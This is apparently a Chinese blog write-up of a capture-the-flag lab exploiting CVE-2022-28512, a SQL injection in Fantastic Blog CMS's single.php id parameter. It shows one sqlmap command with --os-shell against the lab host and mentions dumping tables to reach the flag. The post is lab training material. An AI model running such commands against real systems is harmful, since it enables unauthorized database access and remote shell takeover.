CVE-2022-28512

最新推荐文章于 2024-07-01 19:30:01 发布

Hxdih

最新推荐文章于 2024-07-01 19:30:01 发布

阅读量148

点赞数

分类专栏： CVE漏洞复现文章标签： sql web安全

本文链接：https://blog.csdn.net/m0_51674437/article/details/131714087

版权

CVE漏洞复现专栏收录该内容

10 篇文章 0 订阅

订阅专栏

CVE-2022-28512

运行环境：春秋云镜

根据题意找到注入点。
在这里插入图片描述
注入点id=x，直接通过sqlmap进行注入

sqlmap.py -u http://eci-2zeewd3dr3xicdul0rx3.cloudeci1.ichunqiu.com/single.php?id=4 --random-agent --batch --os-shell

在这里插入图片描述

找到数据库后再找表直接导出就可以看到flag了

在这里插入图片描述

代码审计（single.php)
在拖源码的时候学习上可以直接拖单个文件。

这里的接受的id是直接拼接的，没有用到参数化导致出现问题

用chatgpt给的答案，~~用的是chatgpt3.5直接给全部给不了建议~~

在这里插入图片描述
活用chatgpt

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Hxdih

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

Fantastic Blog CMS SQL注入漏洞(CVE-2022-28512)

千寻的博客

11-28

1294

Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客，它为您提供了广泛的功能来定制您的博客以满足您的需求。 - 它具有强大的功能，您无需接触任何代码即可启动并运行您的博客。 - 该CMS的`/single.php`路径下，`id`参数存在一个`SQL注入`漏洞。

CVE-2022-33891POC Apache Spark 命令注入（CVE-2022-33891）POC

08-10

CVE-2022-33891POC Apache Spark 命令注入（CVE-2022-33891）POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本，参考官网链接： ...

1 条评论您还未登录，请先登录后发表或查看评论

Sourcecodester Fantastic Blog CMS v1.0 SQL 注入漏洞（CVE-2022-28512）

最新发布

Flag少侠的博客

07-01

9697

CVE-2022-28512 是一个存在于 Sourcecodester Fantastic Blog CMS v1.0 中的 SQL 注入漏洞。攻击者可以通过中的id参数注入恶意 SQL 查询，从而获得对数据库的未经授权的访问和控制。id强烈建议用户立即更新 Sourcecodester Fantastic Blog CMS 至最新版本，或者应用官方提供的补丁。同时，在应用程序开发中应实施严格的输入验证和参数化查询，以防止 SQL 注入漏洞。

CVE-2022-28512 春秋云境.com

qq_42036164的博客

01-07

344

Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客，它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能，您无需接触任何代码即可启动并运行您的博客。该CMS的/single.php路径下，id参数存在一个SQL注入漏洞。

春秋云镜CVE-2022-28512

sjsjshhs134654的博客

09-26

261

【代码】春秋云镜CVE-2022-28512。

CVE-2022-28512(Fantastic Blog (CMS))

qq_45092459的博客

11-27

1569

Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。打开标靶，有一个博客网站，发现有注册登录端口。我先是自己上套路走流程没有发现到sql注入，然后回去看了哈他的提示.结果漏洞存在于这个路径下，然后就是sqlmap一个跑就出来了。另外一种一句话直接出来所有的。

春秋云境 CVE-2022-4230 夺旗

05-02

### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件（版本13.2.9及以前）中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...

麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9

03-15

麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关...

sudo-1.9.12p1，解决cve-2022-43995

11-08

"sudo-1.9.12p1"是sudo的一个特定版本，该版本发布是为了修复一个重要的安全漏洞：CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制，以增强系统的安全性。它通过sudoers文件来...

【春秋云境】CVE-2022-28512

ZXW_NUDT的博客

02-22

2425

【春秋云境】CVE-2022-28512

春秋云境：CVE-2022-28512

一只爱吃橙子的羊

11-29

1079

春秋云镜：CVE-2022-28512（SQL注入）

m0_65712192的博客

04-20

441

该CMS的/single.php路径下，id参数存在一个SQL注入漏洞。

CVE-2022-28512 春秋云镜

biejianghua的博客

11-28

770

CVE-2022-28512

【春秋云境】CVE-2022-28512靶场WP

果粒程

11-26

1260

【春秋云境】CVE-2022-28512靶场WP

春秋云境靶场CVE-2022-28512 sql手工注入

l181954187的博客

04-08

691

靶标介绍：Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客，它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能，您无需接触任何代码即可启动并运行您的博客。该CMS的/single.php路径下，id参数存在一个SQL注入漏洞。由于题目直接给出了路径和参数那便直接跳转，

春秋云镜wp day1

xy404的博客

10-13

3687

今天看到之前买了内网渗透那本书，今天看到靶场上线了，打一天玩一下，总体cve的洞很好刷，比打CTF轻松多了。